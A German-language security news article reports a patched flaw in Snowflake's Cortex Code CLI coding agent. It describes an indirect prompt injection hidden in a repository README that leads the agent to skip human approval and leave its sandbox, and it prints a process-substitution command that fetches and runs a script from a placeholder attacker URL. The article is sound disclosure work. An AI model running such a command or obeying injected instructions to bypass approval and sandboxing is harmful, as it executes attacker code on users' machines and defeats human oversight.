Snowflake Cortex Code CLI-Schwachstelle ermöglichte Sandbox-Escape und Malware-Ausführung

✍️ OpenClawRadar📅 Veröffentlicht: 19. März 2026🔗 Source
Snowflake Cortex Code CLI-Schwachstelle ermöglichte Sandbox-Escape und Malware-Ausführung
Ad

Sicherheitslücken-Details

Das Snowflake Cortex Code CLI ist ein Befehlszeilen-Codierungsagent, der ähnlich wie Claude Code und OpenAI's Codex arbeitet, mit integrierter Funktion zur Ausführung von SQL in Snowflake. Zwei Tage nach der Veröffentlichung wurde eine Sicherheitslücke im Befehlsvalidierungssystem von Cortex Code identifiziert, die speziell konstruierte bösartige Befehle ermöglichte, beliebige Befehle auszuführen, ohne die menschliche Genehmigungsschritte auszulösen, und diese Befehle außerhalb der Sandbox des Cortex CLI auszuführen.

Angriffskette

Der Angriff funktioniert über indirekte Prompt-Injection. Ein Benutzer öffnet Cortex und aktiviert die Sandbox, dann bittet er Cortex um Hilfe mit einem Drittanbieter-Open-Source-Codebasis. Eine in der README eines nicht vertrauenswürdigen Repositorys versteckte Prompt-Injection manipuliert Cortex zu der Annahme, dass es einen gefährlichen Befehl ausführen muss.

Cortex konnte Befehle innerhalb von Prozesssubstitutionsausdrücken nicht validieren, was die nicht genehmigte Ausführung des bösartigen Befehls ermöglichte:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Dieser Befehl lädt ein Skript vom Server eines Angreifers herunter und führt es aus. Die Umgehung funktionierte, weil:

  • Unsichere Befehle innerhalb eines Prozesssubstitutions-<()-Ausdrucks nicht vom Validierungssystem ausgewertet wurden
  • Der vollständige Befehl mit einem 'sicheren' Befehl begann (in diesem Fall cat)
  • Befehle in Prozesssubstitutionsausdrücken niemals menschliche Genehmigung auslösten
Ad

Sandbox-Umgehung

Die Prompt-Injection manipuliert auch das Modell, um ein Flag zu setzen, das die Ausführung von Befehlen außerhalb der Sandbox auslöst. Cortex kann standardmäßig ein Flag setzen, um die Ausführung von Befehlen außerhalb der Sandbox auszulösen, und die Injection nutzt dies, um dem bösartigen Befehl zu ermöglichen, außerhalb der Sandbox ausgeführt zu werden.

Behebung

Das Snowflake-Sicherheitsteam validierte und behebt diese Sicherheitslücke und veröffentlichte einen Fix mit Cortex Code CLI Version 1.0.25 am 28. Februar 2026. Die vollständige Empfehlung von Snowflake ist innerhalb der Snowflake Community Site verfügbar unter: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Hinweis: Diese Angriffskette galt auch für Nicht-Sandbox-Benutzer. Die Dokumentation zeigt, dass im OS+Regular-Modus alle Befehle eine Benutzerfreigabe anfordern. Befehle, die in der Sandbox ausgeführt werden, haben auch Netzwerk- und Dateizugriffsbeschränkungen.

📖 Read the full source: HN AI Agents

Ad

👀 Siehe auch

Sandboxing von KI-Agenten mit WebAssembly: Standardmäßig keine Berechtigungen
Sicherheit

Sandboxing von KI-Agenten mit WebAssembly: Standardmäßig keine Berechtigungen

Cosmonic argumentiert, dass herkömmliches Sandboxing (seccomp, bubblewrap) für KI-Agenten aufgrund der Umgebungsberechtigungen ungeeignet ist. Das capability-basierte Modell von WebAssembly gewährt standardmäßig keinerlei Berechtigungen und erfordert explizite Importe für Dateisystem, Netzwerk oder Anmeldedaten.

OpenClawRadar
Cloak-Tool ersetzt Chat-Passwörter durch selbstzerstörende Links für OpenClaw-Agenten.
Sicherheit

Cloak-Tool ersetzt Chat-Passwörter durch selbstzerstörende Links für OpenClaw-Agenten.

Cloak ist ein Open-Source-Tool, das in Chats mit OpenClaw-Agenten geteilte Passwörter durch selbstzerstörende Links ersetzt. Jeder Link kann nur einmal geöffnet werden, danach verschwindet das Passwort, wodurch verhindert wird, dass sich Passwörter in Chat-Verläufen ansammeln.

OpenClawRadar
Cyberkriminelle wehren sich gegen KI-generierten Schrott in Untergrundforen
Sicherheit

Cyberkriminelle wehren sich gegen KI-generierten Schrott in Untergrundforen

Neue Forschungsergebnisse zeigen, dass minderqualifizierte Hacker und Betrüger sich über KI-generierte Beiträge in Cyberkriminalitätsforen beschweren, da sie diese als minderwertiges Rauschen betrachten, das das Vertrauen in die Gemeinschaft und die soziale Interaktion untergräbt.

OpenClawRadar
Kritische OpenClaw-Sicherheitslücken am 28.03.2026 gepatcht.
Sicherheit

Kritische OpenClaw-Sicherheitslücken am 28.03.2026 gepatcht.

OpenClaw Version 2026.3.28 behebt 8 kritische Sicherheitslücken, die vom Ant AI Security Lab entdeckt wurden, darunter Sandbox-Umgehung, Rechteausweitung und SSRF-Risiken. Nutzer mit Versionen ≤2026.3.24 sollten sofort aktualisieren.

OpenClawRadar